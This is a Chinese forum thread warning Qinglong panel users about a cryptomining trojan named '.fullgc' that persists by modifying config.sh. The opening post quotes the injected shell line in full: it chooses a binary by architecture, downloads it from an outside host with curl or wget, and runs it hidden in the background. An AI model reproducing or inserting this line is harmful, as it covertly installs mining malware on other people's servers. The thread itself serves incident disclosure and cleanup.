每日签到奶昔超市积分商城奶昔访达
返回列表 发布新帖
查看: 88|回复: 2

[快讯] 快去检查你的青龙面板可能中挖矿木马了?

1#
发表于 昨天 22:37 | 只看楼主 |倒序浏览 |阅读模式

登录后免广告,享受更多奶昔会员权益!

您需要 登录 才可以下载或查看,没有账号?注册

×

2026年2月7日,多名用户发现青龙面板被植入名为.fullgc的挖矿木马,导致服务器CPU占用率异常升至800%。该木马通过篡改config.sh配置文件实现持久化,并能根据系统架构自动下载恶意程序。排查结果显示,暴露于公网IPv4环境的服务器是该木马的主要攻击目标。

安全机构判定该程序属于SusMiner家族,主要通过连接XMR矿池进行非法挖矿。GitHub社区已出现多例相关案例报告,建议用户检查/ql/data/db/路径下的隐藏文件。受影响用户需清理恶意代码并关闭公网管理端口以防范后续风险。


检查\data\config\config.sh 最后一段有

d="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";case "$(uname -s)-$(uname -m)" in Linux-x86_64|Linux-amd64)u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";;Linux-aarch64|Linux-arm64)u="https://file.551911.xyz/fullgc/fullgc-linux-aarch64";;Darwin-x86_64)u="https://file.551911.xyz/fullgc/fullgc-macos-x86_64";;Darwin-arm64)u="https://file.551911.xyz/fullgc/fullgc-macos-arm64";;esac;[ -n "$u" ]&&[ ! -f "$b" ]&&{ curl -fsSL -o "$b" "$u"||wget -qO "$b" "$u"; }&&chmod +x "$b";[ -f "$b" ]&&! ps -ef|grep -v grep|grep -qF ".fullgc"&&nohup "$b" >/dev/null 2>&1 &

删除然后重新创建镜像 这个就是挖矿病毒 不要再继续使用5700了换个端口
爱生活,爱奶昔~
回复

使用道具 举报

2#
发表于 昨天 23:28 来自手机 | 只看Ta
虽然论坛说过好多次了,但这次的是被一个大型频道拿出来说的
TG频道消息地址:https://t.me/zaihuapd/39866
爱生活,爱奶昔~
3#
发表于 1 小时前 来自手机 | 只看Ta
这么恐怖啊
爱生活,爱奶昔~
您需要登录后才可以回帖 登录 | 注册

本版积分规则

© 2026 Naixi Networks. 沪ICP备13020230号-1|沪公网安备 31010702007642号手机版小黑屋RSS
返回顶部 关灯 在本版发帖
快速回复 返回顶部 返回列表